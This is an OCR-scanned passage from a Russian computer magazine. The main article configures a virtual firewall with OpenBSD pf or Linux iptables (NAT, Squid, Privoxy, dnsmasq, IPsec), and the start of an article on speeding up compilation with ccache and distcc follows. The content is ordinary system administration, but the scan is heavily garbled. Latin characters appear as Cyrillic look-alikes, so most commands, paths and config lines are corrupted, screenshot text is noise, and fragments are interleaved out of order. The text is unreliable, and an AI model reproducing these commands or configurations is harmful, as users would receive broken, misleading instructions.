«внутреннего» (І_АІ\І) интерфейса гостевой ОС, запу- 
щенной в виртуальной машине (ѵісі в случае ОрепВЗО 
или еШІ в Ыпих). Здесьтакже выключаем «Клиент для 
сетей Місгозоіі». При создании виртуальной машины 
указываем два сетевых адаптера. В одном указываем тип 
подключения «Сетевой мост» и выбираем в списке «Имя» 
реальный сетевой адаптер (например, ѴѴі-Рі), подключен- 
ный к интернет. Тип второго указываем как «Виртуаль- 
ный адаптер хоста», через него и будем подключаться к 
глобальной сети. 

Считаем, что гостевая система уже установлена, и переходим 
непосредственно к настройкам. 

НАСТРОЙКИ РАСКЕТ РИТЕР 

Первым делом нужно включить форвардинг пакетов между 
двумя сетевыми интерфейсами: 

# зузсСІ пеС . іпеС . ір . ТогѵгагсІіпдЫ 

Чтобы изменение вступало в силу после каждой перезагруз- 
ки, снимаем комментарий с соответствующей строки файла 
Мс/зузсИ.сопі 

Далее создадим простейшее правило для выхода в интернет 
через І\ІАТ, пишем в рісопТ 




© 2ип ШгІімЙВак 



Создать гшвуш Е N |.Н >4] ІЭ МІШНку 



Создаем новую виртуальную машину 



В выводе консоли получим все активные правила РР, 
причем вместо названий интерфейсов будутуказаны 
ІР-адреса. Чтобы проверить состояние І\ІАТ, наби- 
раем: 



# рСсСІ -з зСаСе 



Теперь входим в интернет с локальной системы и 
сканируем внешний ІР (выданный провайдером) при 
помощи сканера вроде птар на наличие открытых пор- 
тов. Далее развиваем созданные правила, разрешив, 
например, выход в интернеттолько по определенным 
портам: 

#ѵі /еіс/рісоггі 

Сср_згѵ = "{ ззТц зтСр, сіотаіп, шт , рорЗ }" 
исір_згѵ = " { сіотаіп } " 

Ыоск аіі 

разз оиС іпеС ргоСо Сер Со апу рогС $Сср_згѵ 
разз оиС іпеС ргоСо исір Со апу рог С $исір_згѵ 

Вместо названий сервисов из /еіс/зегѵісез в правиле 
можно указать номера портов, здесь кому какудобнее. 
Просмотреть статистику при помощи ркД достаточно 
просто: 

# рТсСІ -з іпТо 

Для более наглядного мониторинга можно использовать 
утилиты вроде піюр или рііор. Для этого через перемен- 
ную окружения РК0_РАТН указываем РТР-зеркало ( ѵѵѵѵѵѵ. 
орепЬзсІ.огдЛір.ЫппІ ). с которого будем ставить прекомпили- 
рованные пакеты: 







> ѵѵагпіпд 

Менеджер вирту- 
альных носителей 
Ѵі гіиа ІВох может 
не принятьустано- 
вочный 150 образ 
ОрепВЗО (іпзІаІІАб. 
ізо), в этом случае 
придется записать 
его на болванку 
и ставить, используя 
реальный привод. 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

• Сайт Ѵі гіиаІВох — 
ѵѵѵѵѵѵ.ѵігІиаІЬох.огд 



#ѵі/еІс/р{.соггі 

паС оп ѵісО Сгош ѵісі : пеСѵтогк Со апу -> ѵісО 
Ыоск іп аіі 
разз іп оп ѵісі 

Здесьактивированатрансляция адресов для сети, подклю- 
ченной к интерфейсу ѵісі , с которого разрешен весьтрафик. 
Все порты прикрыты. Проверяем файл на наличие ошибок и 
применяем правила: 

# рСсСІ -пС /еСс/рС.сопі 

# рСсСІ -ѵі /еСс/рі.сопС 



# ехрогС РКС_РАТН=ССр : / /ССр . орепЬзсі. огд/риЬ/ 
ОрепВ8Б/4 . 6/раскадез/і386 

И выполняем установку: 

# ркд_аскі рССор 

# ркд_асі(і пСор 



• Список РТР зеркал 
ОрепВЗО — ала/ѵѵ. 
орепЬзсІ.огд/Др.ЫппІ 

• Сайт Опзтазд — 
Ібекеііеѵз.огд.ик/ 
сіпзтазд 



ДОПОЛНЯЕМ СХЕМУ 

Уменьшить количество входящего трафика, сократить время 
загрузки страниц и порезать баннеры поможет кэширующий 
прокси-сервер 5диіб. 
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ІЛМІХОЮ 



Настройка зри ісІОиагсІ и НАѴР подробно опи- 
сана в статье «Вооруженный бронекальмар», 
опубликованной в июньском номереПза 2008 
год, поэтому здесь не останавливаемся. 

Кстати, подобная схема с виртуальным 
файрволом может быть интересна тем, кто 
хочет максимально обезопасить свое пре- 
бывание в интернет. Не секрет, что браузер 
на сайте оставляет своеобразный отпечаток, 
который может поведать многое о твоей сис- 
теме. Применение прокси-сервера позволя- 
ет скрыть большую часть информации путем 
модификации заголовков. Для тех, кто не 
хочет возиться со ВдиісІ, могу порекомендо- 
вать Ргіѵоху (Ргіѵасу Епбапсіпд Ргоху, ргіѵоху. 
огд ] — некэширующий прокси с возможнос- 
тями фильтрации контента для повышения 
приватности и безопасности веб-серфинга. 
Установка Ргіѵоху сводится к выполнению 
команды: 



П гг'г сдоіцйдод 



Ьаіі&цлзе: *п | і<*ии] 
ііікй ІГ ій ИиЫ ЙЬ 



ОргдШШ 

Ріо)кІ Оопіч 
Нясгіѵѵагс РЫ іопи-ч 



шок змарі 

ЕѴ-стіГе Рісак 
СопдиптнІ Епру мі 



Оиіу Си о гтМг Ьокз Іи Йн «Іг^шІІ и» мН. Іи л кік в| л Іоие Ішіс ! 

Тік |ЧО|п:і а ГКЕЕ. іішМі'іЛагіои» л Жчіі-Ьііл'кі ЦНЮС*Мке ліиг№ вѵдіви. Ощ е#сцт* евфЬаас* радДОКу. 

іШКкЁйІзіНм, дномііУвгянніѵ шй ці^лаГкІ ?і>р(»аічИіѵ . ррвіВяЬ аддонѣ Іііічу ашіМкіи і>Е ннні ргаршік Амы 

ЕѴЕ4 іКОІЛів). Гі«В$І>. ІвйК. В5ГЮ5, ЧшОЙ шІ НР-ГХ 



ОеШіій Кингсе 

Лдіе>аСѴ& СѴЗуис 
СѴЗітр тагеід 

Ке^оигсед 

РаИсІіЬ: 
Вп у Тгпскшу Идшііілр 
ЫаШІІЩІІЁІЗ 

ДйЕЙиЙаа Вайадя 

ВоокзіЬд» Нф 
УрепВБШситаІ 



ОрчФЗР (3 Іи*- »-яі4Ы* й#иі ощ пт *[і«з, лші ака аѵяіМЫеп щадаеф«№Тб 3<Т> 

ТІІ* і іщдці і еЬяде Ы <?раіИаі> 4 ч - ЦЬІ(ІІѴѴПІ№<І 0<1 15. 

ОрсиВІІІ» и сЬѴеЬфсі] сиіи А' іа ѵаЫпі а ТІк ]]иэ]«І ряув Гов іЬе <1п(Іо|иікиІ вид швіікиГ лиЛ <Іст<гІорег атаія Ьу юеІЬіф <!ТКч 
ГІЛѵІІйІІ 3 ».(о||і-сГт •>(:' діііі Ьу лс^-ерЛи? ■ Імц^Івмц- Ком імаліиг.іікчн ліиі ішіптсіііаіз, ТНезе Еііписси лмисПілІ і.фсиВКІі мтИ 
ичііпим То едаг, шиі лѵіИ гсшзш А «с Грі л-йгѵри* Іо ия* пиві і «ъи яя 1Ь*у я» № Т.-яМО* аиіі |>Мй.* яѵаі|а№ а* «Ні. ІиіГ Лц ноі 
Лиц I Лк РІ4ЦССТ 



СДКіііьі ОрепВЗП 

СРеѵТчіиі я.Тд^сгв 



Кир]нігМц|Е> ОрепВКО 



АіидоН донП; Озгл55К. СаедіДРР , РриИТИл СмдгРУ-З 



МіггеЕЕ. Ьу сопивѵ ІЕ. ЕЕ ІЖ ЕЕ.ЕКШГШ ЕЕ Ш:Ж! Еі ЕЕ ЕЕ ЕЦЕТЖ ПА НЕ 

ОрепВБР — легкая и безопасная ОС. отлично подходит для наших задач 



# ркд_а(М здиіс1-2 . 7 . ЗТАВЬЕб . кд 2 

Открываем конфигурационный файл /еіс/здиісі/ 
здшб.соп^ и разрешаем подключения: 

#ѵі/еІс/5яиісІ/5диісІ.соп^ 

ІШкр_рогк 312 8 

### В случае прозрачного проксирова- 



обратиться к внешнему веб-сайту. Как вари- 
ант, можно настроить прозрачное прокси- 
рование, чтобы пользователи, пытающиеся 
подключиться к80 и 8080 портам внешних 
ѵѵеЬ-серверов, автоматически перена- 
правлялись на локальный порт, на котором 
работает ЗдиісІ: 



ния директива примет вид : 



#ѵі /еіс/р^.соггі 



# ркд_аскЗ ргіѵоху 



# 1Шкр_рогк 127 . О . О . 1 :3128 кгапзрагепк СаЫе <с1іепСз> { 192.168.1.2, 



### Указываем диапазон ІР внутренней 
сети 

асі 1ап_пек зге 192.168.1.0/24 

### Разрешаем выход в интернет из 

сети 192.168.1.0/24 

Ъ±Щр_ассезз аіісж 1ап_пек 

### Размер кэша указываем с учетом 

объема ОЗУ, выделенного ѴМ 

саске_теш 32 МВ 

тахітит_оЬз есб_зІ 2 е 10240 КВ 

сасЪе_с!іг иіз /ѵаг/здиісі/сасЪе 5000 16 256 

Создаем каталогдля кэша и запускаем кэширу- 
ющий проксик: 

# здиіб -2 

# здиіб 

Теперь можно проверить, слушается ли нужный 
порт: 

# пекзкаР -апб | дгер 312 8 



192.168.1.5 } 

РаЫе <посасЬе> { 192.168.1.0/24 } 
гбг оп іпеР ргоРо Рср ігош <с1іепРз> 
Со ! <посасЬе> рогР { 80 8080 } -> 
127.0.0.1 рогр 3128 

Когда все настроено, обеспечиваем автозагруз- 
ку 5д и іб при старте системы: 

#ѵі /еіс/гс.іосаі 

іі [ -х /изг/1оса1/зЬіп/здиіб ] ; Ркеп 
есію -п 'здиіб'; /изг/1оса1/зЬіп/здиіб 
іі 

При желании Здиіб можно дополнить дру- 
гими модулями. В портах есть здиіббиагб 
[ ѵѵѵѵѵѵ.здиібдиагб.огд ] и НАѴР (НТТР АпПі Ѵігиз 
Ргоху, ѵѵѵѵѵѵ.зегѵег-зібе.бе ] . Первый поможет 
в борьбе с баннерами, блокировкой файлов 
и определенных ресурсов, второй умеет 
проверять трафик несколькими антивиру- 
сами. 



Теперь настраиваем браузер, чтобы он выходил 
в интернетчерез порт81 18, и набираем в 
адресной строке ЬНрУ/сопЛд.ргіѵоху.огд/ ікрат- 
кая форма: Шр://р.р ]. В результате получаем 
возможность редактирования параметров прок- 
си-сервера. Дефолтные правила обеспечивают 
блокировку Соокіез, рор-ир, некоторыхтипов 
баннеров. Поумолчанию Ргіѵоху слушаеттолько 
локальный интерфейс, для доступа к нему с 
хостовой машины или из І_АЫ следует изменить 
инструкцию Іізіеп-аббгезз в сопТдТхТ указав ІР 
сетевого интерфейса ѵісі : 

Іізбеп-аббгезз 191.168.1.1:8118 

Возможностей, каки настроек, в Ргіѵоху очень 
много, подробно он рассматривался в статье 
«Маленькое окно в большую сеть», опублико- 
ванной в ][ 03.2007. При необходимости можно 
заставить его работать в тандеме с кальмаром, 
для чего в здиіб.сопі" достаточно добавить всего 
одну строку: 



Перестраиваем браузеры на подключение # ркд_асМ здиібдиагб 

через порт 31 28 интерфейса ѵпесі и пробуем # ркд_асМ каѵр 



саске_реег 127.0.0.1 рагепк \ 
8118 7 по-диегу 



СПИСОК ПОЛЕЗНЫХ ПАРАМЕТРОВ ІРТАВІ.ЕЗ 



ірІаЫез -Р — очищаем цепочки, разрешая все подключения 
ірІаЫез -Т паі -йизб — очистить таблицу ЫАТ 
ірТаЫез -б— просмотр списка правил 



В качестве еще одного бонуса к нашему интел- 
лектуальному файрволу можно порекомендо- 
вать легкий кэширующий 0145 (атакжеТРТР 
и ОНСР] сервер Опзтазд [ ібекеііеѵз.огд.ик/ 
бпзтазд і. Ставится он просто: 



► 080 
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Разрешаем форварди нг в зѵзси.сопі 



# ркд_ас!с1 сіпзтазд 

После этого в конфигурационном файле сіпзтазц.сопі 1 ука- 
зываем сетевой интерфейс, на котором он будет принимать 
запросы: 

1ізкеп-ас1с1гезз=127 .0.0.1, 192 . 168 .1.1 

Теперь все повторные ОЫЗ-запросы будут выдаваться из 
кэша и выполняться быстрее. 

НАСТРОЙКА ІРБЕС В 0РЕЫВ50 

Теперь научим виртуальный файр подключаться по ѴРКІ. 
Разберем соединение по протоколу ІРзес при помощи ути- 
литы ірзессіТ, входящей в стандартную поставку. Итак, наша 
внутренняя сеть 192.168.1 .0/24, внешний ѴѴАЫ интерфейс 
получает ІР-адрес 1.2. 3.4, соответственно в удаленном офисе 
І_АЫ - 1 92. 168.2.0/24 и ѴѴАЫ — 5. 6. 7. 8. Открываем в редакторе 
конфиг/еіс/ірзес.соп^ и указываем настройки сетей: 



йѵі/еіс/ірзес.соггі 

іке езр кгот 192.168.1.0/24 ко 192.168.2.0/24 \ 
реег 5 . 6 . 7 . 8 

іке езр кгот 1.2 .3 .4 ко 192.168.2. 0/24 \ 
реег 5 . 6 . 7 . 8 

іке езр кгот 1.2. 3.4 ко 5. 6. 7. 8 



#ѵі /еіс/р^.соггі 

зек зкір оп { Іо ѵісі епсО } 
разз диіск оп ѵісО кгот 5 . 6 . 7 . 8 

Теперьс ѴРІЧ-сервера копируем публичный ключ и сохраняем 
егов/е1:с/І5актрб/риЬкеу5/ірѵ4/5.6.7.8,асвой ключ/еію/ізактрсі/ 
ргіѵаІеДосаІ.риЬ передаем на 5. 6. 7.8. Набираем на обоиххостах: 

# ізактрсі -К 

# ірзесскі -к /екс/ірзес . сопк 

Если все проходитнормально, обеспечиваем автозапускпри 
загрузке системы (если в этом есть необходимость]. Для чего 
добавляем в Мс/гс.сопк [оса Іодну строку: 

ізактрсі= " -К" 

С ОрепВЗО, надеюсь, все понятно. Перейдем кЫпих, многие 
вопросы, за исключением настройки правил пакетного филь- 
тра и установки программ, будутаналогичны. 

ОРГАНИЗАЦИЯ ЫАТ В ШУХ 

В Ыпих пакетный фильтр ЫеШІіег управляется при помощи 
консольной утилиты іріаЫез. Настройки отличаются по напи- 
санию, но, по сути, остаются теми же. Для начала разрешаем 
форварди н г пакетов: 




> іпіо 

• ЮЬипШ Зегѵег 9.10 
для своей работы 
требует 1 92 Мб 
ОЗУ и 1 Гб места 

на харде ( ибипіи. 
сот/ргосіисіз/ 
уѵЬабзиЬипіш/ 
зегѵегесі іііоп/ 
ІесЬвдесз). 

• Обзор популярных 
средств, обеспечи- 
вающих совместный 
выход в интернет, 
читай в статье 
«Привратник для 
локальной сети», 
опубликованной в 
июльском номере ][ 
за 2009 год. 



# есію 1 > /ргос/зуз/пек/ірѵ4/ір_когмагс1 



На удаленном хосте файл Мс/ірзес.сопі'будетаналогичным, 
только заменяем ІР и в описании подключения добавляем ключ 
раззіѵе, означающий, что данный узел будет ожидать подклю- 
чение (соединение инициализируетудаленная система): 

іке раззіѵе езр кгот 5. 6. 7. 8 ко 1.2. 3.4 

В правилах РЕ разрешим подключение судаленного узла 
и укажем, что не нужно фильтроватьтрафик, проходящий 
через интерфейс обратной петли, а также через внутренний и 
виртуальный интерфейсы: 



Или каквариант: 

# зузскі -ѵі пек . ірѵ4 . ір_когмагс1=1 

Чтобы форвардингактивировался при загрузке системы, 
используем /еІс/зузси.сопЕ 

пек . ірѵ4 . ір_когѵгагс1 = 1 

Обрати внимание, переменная механизма зузсИ несколько 
отличается отаналогичного параметра в ОрепВЗО. В различ- 
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Я Пж Ерг 1* (ОС ЛирИѵііі? Дл* вдл роівЯвдя 1)1»1тВ1рЬ 

Я 

5? СП “П*Ч С(Т:.ЬМ*Г**»в«1 \ . < ? : ЙвГвчи ^ ТЛЕ Й^ЦЭІ \ Я * ш \ Я * С ( I 4 "] ) , *Л4І &іт »ч 

[1ТІ«сДсЬіз.»ігег|і !- ' иоасЯпга' |7(|Э * 1 ОБЕ.: ' + ііііл . Ьсеі) е ШІ&ід 



В СепЮЗ правила сохраняются командой: 



сіоѵѵп.сі). Чтобы правила при загрузке за гружа- 
лисьавтоматически, добавляем в конецфайла 
еіс/пеТѵѵогкз/іпТегіксез следующую запись: 



# ѵі /еіс/пеіѵѵогкз/іпіегіасез 



### Загружаем правила при поднятии 



интерфейса 

рге-ир ірДаЫез-гезДоге < /еДс/ 
ІрДаЫез . гиіез 



# зегѵісе ІрДаЫез заѵе 

После этого все рулесеты можно найти в/еіс/ 
зузсопбд/ірІаЫез. Для автоматической их 
загрузки при старте системы достаточно раз- 
решить два параметра в файле /еіс/зузсопіід/ 
ірТаЫез-сопбд: 

# ѵі /еІс/зузсоггіід/ірІаЫез-соггіід 

I РТАВЬЕ 3 _ 3 АѴЕ_ОЫ_ 3 ТО Р = "уез " 

I РТАВЬЕ 3 _ 3 АѴЕ_ОЫ_КЕ 3 ТАКТ = "уез " 



і >е ё* 4 ее Лѵшміве игГеЕггЕг 1 «ѣскіид, 
и Тез Г. раоег ІіМр : //ІгѴ» Ояѵйзсг ірЕ -рвд* . соя^ с сісггсг , ЛЕиіІ 

а I ( Я 1 ! В4\ ь ] чгеЕеггег | "НоЕ Ѵоиг Пиаімаа 1 "ІцізЦ 



в/ ( ?м 7 Е С-ЙІВ | + 1 7 ;Л**яи Ц] ?В«і№иѴ^* т - 1 ЬЯ*1 ?//Ід 



> КШ ОйОпЗем) рфрііря, ?іл№Ѵг 

Я “Рем ! Ьар : //и™, Ейм г, .е-ми/ ашчЯ)в/ уйАоо/ ье ее/ ѵіі ■ Нтілі 

ш 

Я/ [4ікн1;\ 84 [ * >] г | апипіояй/ 1 1 пйѵег/ Й 1 1Г 

а | [<34ггірС . т ] < іікіпѵ'іі . а пип Е впй | ?■ . Е -і/эсг 1рЕ>] 1 1 іпсѵсе [ я ідіі 



г ьіер://* 



Ідѵ.оре-гіі к ишпт. іілпвві ніиіот Еелт.игеа ■ 
г. ЬЪ*1дККи*Я - ссвд/амутава/ 1 МЕи Зв . лее! 



я/ Свр*н\*П 4 [П] )4с«1ыЫа-3 {[■>!?) (ТілэіО) \&/*і42ѵ»*г/««0 
я/ с&игіи’і * щ [ х м ] +іее*ь «й»Ц [ * 1 ] ?Н 7 * пві О) \ 2 / л и ум Шя ідіі 
я/ г*ре гЛ *П і [ * \ | ] +й еле 148“ ) іг 1 ]!] С?;яд|0|Ч1/9:Шѵ«аТ2/аідЦ 
И/ СЕцкпЧвП і [ л \С \ +эсто11 С?г 1.П0І ЬагйИІі (Г“ ] Т] і?:пі5І 0|Л2/?іЯниЕаІ2/8ідІС 
а/ [г>веп\лП < [ А 1] ] +пи гшЬас ■ ) <["' 1 ?) [7іікЦОі\2/І іЯусэ$2/яідО 
я/ [доя\лП ДПИ +ѣлоШвс-Н^Ч ?> [^зшНОІѴІДКІуипЯ/відВ 
я/ СФреаЧлП 1 [ А \ ] } +ЛгкЕоп*я-] [(*')>>< )ім | О] \ ЫІ 1$2уия?2/лід0 
я/ [ррдв\яП 1 [ А \ ] I «иі ідех^вн-] (Г Р ‘]Я (*іум-| іПітЯтЫІ/лІдП 

я/ С®р*вЧ*'1 < [*и |4*1п*ггр|7;гягнгр юияефй) -И [ " ' I 7> [7 = ѵ»*І іЛг/#і*гво(г/лідИ 
я/ Сецмия^ л'І а'ч І+Е-?і^И*) н ["' ] Ц 1?!ЦРІІ)У/1 і«ад«/лідо 
я/ с&ре іЛ • 1 [ ' \ і ] 4 ій Ни уя* Н [ " ' ] ?П 7 і і^е * И Л 2/ і 1 л л <цэ 

я/ (дошМП і [*\ I ] +гіъ1еЬ8Е“] Н [ " ' ] 7} С7Еі»1О)\2/Л}2уевІ2/від0 

8/ Сор-егЛвП и л ^ ] 1 44І1МУЗ < ? і ев 1 8сй | іа^ре ф - Н [ “ ' ] ?| [ 7 : ѵ*й 1 1 ) Ч / Я 1 1 по Я/а ідВ 



Настройка Ргіѵохѵчерез веб-интерфейс 



Просмотретьсписокправил ірІаЫез можно 



/ 



командой: 




ныхдистрибутивах могутбытьсвои особенности. 
Так в СепЮЗ/Ребога достаточно ввести одну 
команду: 

# зузТет-сопТід-зесигіТуІеѵеІ 
Проверяем: 

# зегѵісе ірСаЫез зТаТиз 

В качестве альтернативы в этих дистрибутивах 
можно использовать сЬксопбд. Смотрим статус 
запуска іріаЫез: 

# сйксопіід --ІізТ ірСаЫез 
И активируем при необходимости: 

# сЬксопіід іркаЫез оп 

Пусть внутренний сетевой интерфейс (к кото- 
рому подключается локальная система] будет 
еіЫ , а внешний — еіЬО. Чтобы включить ЫАТ в 
Ыпих и разрешить все соединения, достаточно 
прописатьтри правила: 



# іркаЫез -С пак -А РОЗТШЦТШС -о 
еккО Щ МАЗОІІЕКАБЕ 

# іркаЫез -А ЕОЕ^АЕБ -і еСйО -о еСЫ 
-ш зСаСе --зСаСе ЕЕЬАТЕВ,ЕЗТАВЫЗНЕВ 

АССЕРТ 

# іркаЫез -А ЕОКШАКВ -і еСЬ .1 -о еСЪ .0 

АССЕРТ 

Для большей защиты можно разрешить доступ 
только определенным сервисам: 

іркаЫез -А ОВТРВТ -3 АССЕРТ -ш зСаСе 
--зСаСе ЫЕШ, ЕЗТАВЫЗНЕВ, КЕЬАТЕВ -о 
еккО -р Дер -ш тиІДірогД --сірогДз 
80 , 443,8080 --зрогД 1024:65535 

Чтобы ЫАТ работал и после перезагрузки, в 
ІІЬипіи сохраняем все настройки іріаЫез в файл 
при помощи утилиты іріаЫез-заѵе: 

# ірДаЫез-заѵе > /еДс/ірДаЫез . гиіез 

И заносим эту строку в один из скриптов, выпол- 
няющихся при остановке системы (например, 
скрипты из каталога Мс/пеД/ѵогк/ікрозІ:- 



# ірДаЫез — Ь -ѵ 

Все, с файром разобрались. Теперь можно 
наращивать функционал. 5диіб есть в репозита- 
риях пакетов и ставится очень просто. В ОеЬіап/ 
Ибипіи: 

# арД-деД іпзДаІІ здиісі 
Или в СепЮЗ: 

# уиш ІпзДаІІ здиісі 

Чтобы не перестраивать клиентские системы, 
добавим правила іріаЫез: 

ІрДаЫез -Д паД -А РКЕКОВТШС -і еДкІ 
-р Дер -ш Дер --сЗрогД 80 -т'з ВЫАТ --До- 
сіезДіпаДіоп 192 . 168 . 1 . 1:3128 

ІрДаЫез -Д паД -А РКЕЖШТІШ -і еДкО 
-р Дер -ш Дер --сірогД 80 -3 ВЕВІКЕСТ 
--До-рогДз 3128 

При желании Здиіб можно дополнить други- 
ми модулями — АскарреН аскаррег.зіпеІ: ). 
здиібСиагб и НАѴР. 

ЗАКЛЮЧЕНИЕ 

Мы получили абсолютно бесплатный файрвол с 
продвинутыми функциями, надежно защищающий 
хостовуюѴѴіпбоѵѵз машину, и функционал которого 
можно наращиватьдо бесконечности. Возможно, 
кто-то посчитаетего неудобным, но проблему 
быстрой загрузки можно решить, просто замора- 
живая состояние виртуальной машины. Ктомуже 
такой виртуальный блокпостможно использовать 
не всегда, а только в особых случаях. - !" 



СПИСОК ПОЛЕЗНЫХ ПАРАМЕТРОВ РГСТІ. 



рЮк -і/еДс/рі.сопН — загрузить файл ріеопі 

рЫІ-піѴеІю/рісопі 1 — проверитьсинтаксис конфига 

рІси-ЫЮеТс/рісопІ 1 — за грузить только правила ЫАТ 

рки-РІ/еТс/рісопі 1 — загрузить только правила фильтрации 

ріеіі -5п — показатьактивные правила ЫАТ 

рЫІ -зг— показатьактивные правила фильтрации 

ріюН-зз — вывести таблицу состояний 

рЫІ -зі — показать счетчики и статистику фильтрации 

рЮк -за — показать все 



► 082 
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■ ■ Евгений Зобнин гоЬпіпгаатаіІ. сот 




Ускоряем компиляцию приложений с помощью 
ссасііе и (Іізісс 



Сборка приложений из исходников процесс для юниксоида обычный и 
даже обыденный. Мы компилируем приложения, чтобы опробовать но- 
вый функционал, наложить патчи или просто установить пакет в систему 
(привет поклонникам ВЗй и Оепіоо). Однако современные приложения 
настолько велики, что порой этот процесс можетзанять не один час. 
Чтобы не ждать та к дол го, предлагаю воспользоваться специальными 
утилитами, которые могут существенно сократить время сборки прило- 
жений. 



В ообще, способов повышения скорости 
сборки приложений в никсах несколь- 
ко, и не все они требуют использова- 
ния дополнительного софта. Один из 
наиболее простых и прямолинейных способов 
заключается в отключении любых флагов 
оптимизации. Этот шаг действительно дает 



существенный выигрыш в скорости сборки, но 
также приводит к заметному снижению ско- 
рости исполнения скомпилированного софта. 
Если ты согласен стаким положением вещей, 
то можешь приказать компилятору принуди- 
тельно отключать любые оптимизации. Для 
этого добавь следующие строки в 



свой -/.ЬазЬгс: 
ехрогС СРЬАСЗ= ' -ОО ' 
ехрогС СХХР ЬАС 8 = $ С Р Ь АС 8 

Пользователи РгееВЗй и Оепіоо могут ис- 
пользовать файл /еію/таке.сопі 1 для измене- 
ния значения этих переменных: 
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ІШІХОЮ 



> ьигіо гпКсііг -р /игг/ІосаІ/ПЬ/гіійІсс/Ьіп 

> ссі /и5г/ІосаХ/иь/с»і5І:сс/Ьіп 

> зисіо 1п -з /изг/1оеаІ/Ьіп/<Гіз1ісс дсс 

> аіліо 1п -5 /р5г/\оса\/Ьіп/сЦ$і:сс с++ 

> зисГо 1п -а /изгАоса\/Ьіп/гііз1:сс сс 

> ъибо 1п ■■ 5 /изг/ІосаІ/Ьіп/гіізХсс; д++ 

> Ь -1 
ХоХаІ О 

Ігихгѵхгих 1 ГООХ гой* 21 2010-ѲЗ-ЗІ 14:03 

Ігѵюгѵхгѵх 1 гос* гоо* 21 2010- ѲЗ- 31 14:03 

Ѵгихгѵхгих 1 гооХ ГО 0 І 21 2010' 03 -31 14:03 

Ігѵхгѵхгѵх 1 горѣ гос* 21 2Ѳ1Ѳ-03-31 14:02 



-> / ия г/ Іо свІ/Ьіп/гіі»* сс 
-> /иаг/ІосйІ/Ьіп/сіізіЕсс 
-> /и 5 г/Іоеа 1 /Ьіп/с(І 5 Ісс 
-> /изг/іосаі/ьіп/гіізіее 



Создаем фиктивные асе, а++. сс и с++ для сііэісс 

КЕМС0МР=МѴ 
СРІАС5- -02 -ріре 
С0РТРІ_А65= -02 -ріре 

# 0І5І:СС 

. і ? ! бе тРіп есі ( Ш_САСНЕ ) 

СС-/У5 г/ІосаІ/ІіЬехес/ссасНе/ѵ*огІсІ -се 
ССХ-/М5 г/ІосаІ/ІіЬехес/ссас Ье/мо гіеі - е++ 
.елсІіТ 

ЛІ ${ ,СІІП0ІР:Н^/рог1:5/с{еѵе1/ссасІіе} 
М0_ССАСНЕ-уе5 
.епсІіТ 



/ѳХс/таке, сопТ [+] 



Активируем ссасЬе во ГгееВБР 



СРЬАСЗ= 1 -ОО 1 
СХХРЬАСЗ= ’ -ОО 1 




ѳхѳ [іздпівѳч 




!> ссасРіе -б 

сасРіе сіігесѣогу /ѵаг/ѣтр/ссасРіе 
сасРіе Ріі± 123852 
сасРіе тІББ 187142 
саііесі Тог Ііпк 34226 
тиІТірІе воигее Тііез 245 
сотрііе Таііесі 2562 
ргергосезБОГ еггог 3864 
соиісіп‘1: Тіпсі ТРіе сотрііег 1 
поТ а С/С++ Тііе 22498 
аиТосопТ сотрііе/ііпк 42837 
ипвиррогТесІ сотрііег орТіоп 1586 
по іприТ Тііе 18330 
ТіІеБ іп сасРіе 68245 
сасРіе БІге 523.8 МЬуТез 
тах сасРіе віге 512.0 МЬуТез 

Команда «ссасРіе -5» - отличный инструмент для ана- 
лиза состояния кэша 

В системах, основанных на портах, есть специальные опции конфигу- 
рационного файла, позволяющие задействовать этот флаг глобально. 
Например, в Ѳепіоо любые опции таке можно прописать в перемен- 
ную МАКЕ0РТ5 файла /еіс/таке.сопі Во ЕгееВЭБ эта переменная 
носит имя МАКЕ_АР65. 

Втехже «зоигсе Ьазеб» дистрибутивах можно задействовать другой 
трюк, позволяющий сократить время сборки в среднем на 1 0%. Смысл 
его в том, чтобы поместить каталог, используемый для хранения 
промежуточных результатов компиляции, в ітріъ. Скорость доступа к 
файлам существенно возрастет, что и приведет к выигрышу. Боль- 
шинство систем использует для хранения временных файлов один из 
подкаталогов /ѵагДтр, поэтому нам достаточно просто примонтиро- 
вать к нему Ітріз. Пример для Оепіоо: 



В 0 реп В5Б файл носит имя /еіс/тк.сопі 

Ускорить процесс компиляции можно с помощью распараллеливания, 
то есть одновременной компиляции сразу нескольких файлов, содер- 
жащих исходный текст. Те, кто знаком с программированием, должны 
знать, что любая более-менее крупная программа, написанная на 
языке Си, состоит из нескольких обособленных файлов, содержащих 
фрагменты исходного кода. Во время сборки программы эти файлы 
обрабатываются компилятором независимо и лишь в самом конце 
объединяются линковщиком в единый исполняемый файл. Благодаря 
этой особенности сборку приложения можно распараллелить так, 
чтобы эти фрагменты-файлы компилировались одновременно. 
Подавляющее большинство приложений с открытым кодом использу- 
ют таке в качестве утилиты, контролирующей все этапы сборки. Маке 
принимает флаг позволяющий задать количество одновременных 
потоков компиляции (на самом деле, он указывает на количество 
параллельно выполняемых задач, но мы не будем вдаваться в под- 
робности]. Правильно устанавливая значение этого флага, мы можем 
существенно повысить скорость сборки приложения на многоядерных 
процессорах. Так, если твой камень четырехъядерный, то оптималь- 
ное значение флага будет равно... пяти. Все верно, опытным путем 
доказано, что «лишний» поток еще больше ускоряет процесс. Причем 
то же верно и для одноядерных систем, для которых рекомендуемым 
значением 
будет 2. 

В «классических линуксах» флаг "-у следует указывать прямо 
во время сборки приложения: 

$ . /сопіідиге 

$ таке -щЗ 
$ зисіо таке іпзкаіі 



$ зисіо тоипк -к ктркз ктркз -о зіге=1С , пг_іпос!ез = ІМ 
/ѵаг/ктр/рогкаде 

Естественно, машина должна обладать достаточным объемом памяти 
(2 Гб вполне хватит], чтобы Іітіріъ не начала использовать зѵѵар, что 
еще более растянет процесс компиляции. Если же памяти в системе 
мало, то ее можно освободить с помощью завершения всех «толстых» 
приложений и выхода из иксов. 

КЭШИРОВАНИЕ 

По умолчанию компилятор не обращает внимания на ранее ском- 
пилированные файлы и производит полную перекомпиляцию всего 
приложения во время повторного запуска процесса сборки. Это может 
сильно навредить, если ты, например, многократно исправляешь один 
из файлов исходников и каждый раз после этого инициируешь сборку. 
Это также увеличит время экспериментов сядром, когда ты несколько 
раз пересобираешь ядро, пробуя включать и выключать различные 
опции. Для решения проблемы можно воспользоваться услугами 
ссасбе. 

Программа ссасбе - это кэширующий препроцессор, который позво- 
ляет избежать повторной компиляции уже скомпилированных ранее 
файлов. Он генерирует хеш для каждого компилируемого файла, 
поэтому если с момента предыдущей компиляции файл остается не- 
изменным, его повторная обработка не производится, а используется 
уже ранее скомпилированный объектный файл. 

Ссасбе позволяет существенно поднять скорость повторной компи- 
